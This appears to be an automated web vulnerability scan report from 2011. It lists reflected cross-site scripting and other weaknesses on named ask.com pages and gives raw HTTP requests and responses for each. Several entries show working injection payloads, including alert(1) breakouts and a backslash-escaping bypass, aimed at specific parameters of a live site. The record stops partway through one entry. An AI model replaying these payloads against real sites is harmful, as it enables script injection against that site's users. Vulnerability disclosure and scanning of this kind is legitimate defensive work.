XSS, DORK, Cross Site Scripting, Unforgivable Vulnerabilities, CWE-79
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Report generated by XSS.CX at Thu Mar 24 12:49:16 CDT 2011.
1. Cross-site scripting (reflected)
1.1. http://www.ask.com/fifdart [dartgadoutput parameter]
1.2. http://www.ask.com/fifdart [dartgadsafe parameter]
1.3. http://www.ask.com/fifdart [dartgadtype parameter]
1.4. http://www.ask.com/fifdart [dartgchannel parameter]
1.5. http://www.ask.com/fifdart [dartgclient parameter]
1.6. http://www.ask.com/fifdart [darts parameter]
1.7. http://www.ask.com/fifdart [dartsitelive parameter]
1.8. http://www.ask.com/fifdart [dartsize parameter]
1.9. http://www.ask.com/fifdart [darturi parameter]
1.10. http://www.ask.com/fifdart [q parameter]
1.11. http://www.ask.com/pictureslanding [l parameter]
1.12. http://www.ask.com/ [wz_cu cookie]
1.13. http://www.ask.com/ [wz_cu cookie]
1.14. http://www.ask.com/ [wz_cu cookie]
1.15. http://www.ask.com/ [wz_uid cookie]
1.16. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]
1.17. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]
1.18. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_sid cookie]
1.19. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_uid cookie]
1.20. http://www.ask.com/ja-ask-dialog [wz_cu cookie]
1.21. http://www.ask.com/pictures [wz_cu cookie]
1.22. http://www.ask.com/pictures [wz_cu cookie]
1.23. http://www.ask.com/pictures [wz_sid cookie]
1.24. http://www.ask.com/pictures [wz_uid cookie]
1.25. http://www.ask.com/pictureslanding [wz_cu cookie]
1.26. http://www.ask.com/pictureslanding [wz_cu cookie]
1.27. http://www.ask.com/pictureslanding [wz_sid cookie]
1.28. http://www.ask.com/pictureslanding [wz_uid cookie]
2. Cleartext submission of password
3. Password field submitted using GET method
3.1. http://www.ask.com/ja-ask-dialog
3.2. http://www.ask.com/ja-ask-dialog
4. Password field with autocomplete enabled
4.1. http://www.ask.com/ja-ask-dialog
4.2. http://www.ask.com/ja-ask-dialog
4.3. http://www.ask.com/ja-ask-dialog
5. Referer-dependent response
6. Cookie scoped to parent domain
6.1. http://www.ask.com/
6.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
6.3. http://www.ask.com/ja-ask-dialog
6.4. http://www.ask.com/pictures
6.5. http://www.ask.com/pictureslanding
7. Cross-domain Referer leakage
7.1. http://www.ask.com/
7.2. http://www.ask.com/
7.3. http://www.ask.com/
7.4. http://www.ask.com/
7.5. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
7.6. http://www.ask.com/ja-ask-dialog
7.7. http://www.ask.com/pictures
7.8. http://www.ask.com/pictureslanding
8. Cross-domain script include
8.1. http://www.ask.com/
8.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
8.3. http://www.ask.com/pictures
8.4. http://www.ask.com/pictureslanding
9. Cookie without HttpOnly flag set
9.1. http://www.ask.com/
9.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
9.3. http://www.ask.com/ja-ask-dialog
9.4. http://www.ask.com/pictures
9.5. http://www.ask.com/pictureslanding
10. Content type incorrectly stated
1. Cross-site scripting (reflected)
There are 28 instances of this issue:
1.1. http://www.ask.com/fifdart [dartgadoutput parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartgadoutput request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 484eb\'%3b816a68b5162 was submitted in the dartgadoutput parameter. This input was echoed as 484eb\\';816a68b5162 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js484eb\'%3b816a68b5162 &dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:17 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cat';
var google_ad_channel = '';
var google_hints = '';
var google_ad_output = 'js484eb\\';816a68b5162 ';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash';
var google_image_size = '300x250';
var google_...[SNIP]...
1.2. http://www.ask.com/fifdart [dartgadsafe parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartgadsafe request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5650e\'%3be954f92cef7 was submitted in the dartgadsafe parameter. This input was echoed as 5650e\\';e954f92cef7 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high5650e\'%3be954f92cef7 &q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:17 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
0';
var google_num_ads_recieved= '';
var google_language = '';
var google_country = '';
var google_encoding = 'utf8';
var google_safe = 'high5650e\\';e954f92cef7 ';
var google_adtest = 'off';
var google_kw = '';
var google_kw_type = 'broad';
document.write('<script type="text\/javascript" src="http://ad.doublecli...[SNIP]...
1.3. http://www.ask.com/fifdart [dartgadtype parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartgadtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ede9\'%3bfbde3563d45 was submitted in the dartgadtype parameter. This input was echoed as 9ede9\\';fbde3563d45 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash9ede9\'%3bfbde3563d45 &dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash9ede9\\';fbde3563d45 ';
var google_image_size = '300x250';
var google_num_ads_recieved= '';
var google_language = '';
var google_country = '';
var google_encoding...[SNIP]...
1.4. http://www.ask.com/fifdart [dartgchannel parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartgchannel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20b58\'%3bb90d53e5b88 was submitted in the dartgchannel parameter. This input was echoed as 20b58\\';b90d53e5b88 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=20b58\'%3bb90d53e5b88 &dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cat';
var google_ad_channel = '20b58\\';b90d53e5b88 ';
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,fl...[SNIP]...
1.5. http://www.ask.com/fifdart [dartgclient parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartgclient request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f7c\'%3b5cfb58d0629 was submitted in the dartgclient parameter. This input was echoed as e3f7c\\';5cfb58d0629 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cate3f7c\'%3b5cfb58d0629 &dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cate3f7c\\';5cfb58d0629 ';
var google_ad_channel = '';
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
...[SNIP]...
1.6. http://www.ask.com/fifdart [darts parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the darts request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81bb7'%3balert(1)//3de897a564 was submitted in the darts parameter. This input was echoed as 81bb7';alert(1)//3de897a564 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as81bb7'%3balert(1)//3de897a564 &dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as81bb7';alert(1)//3de897a564 ;hhi=159;test=0;ord=1300982826477?">...[SNIP]...
1.7. http://www.ask.com/fifdart [dartsitelive parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartsitelive request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc81f'%3balert(1)//6ea5ef1e2e2 was submitted in the dartsitelive parameter. This input was echoed as cc81f';alert(1)//6ea5ef1e2e2 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dircc81f'%3balert(1)//6ea5ef1e2e2 &darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/5480.iac.usa.ask.hp.x.x.dircc81f';alert(1)//6ea5ef1e2e2 /;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1300982823459?">...[SNIP]...
1.8. http://www.ask.com/fifdart [dartsize parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the dartsize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d20fe\'%3ba9177b1e6f6 was submitted in the dartsize parameter. This input was echoed as d20fe\\';a9177b1e6f6 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250d20fe\'%3ba9177b1e6f6 &darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash';
var google_image_size = '300x250d20fe\\';a9177b1e6f6 ';
var google_num_ads_recieved= '';
var google_language = '';
var google_country = '';
var google_encoding = 'utf8';
var google_safe = 'high'...[SNIP]...
1.9. http://www.ask.com/fifdart [darturi parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ask.com
Path: /fifdart
Issue detail
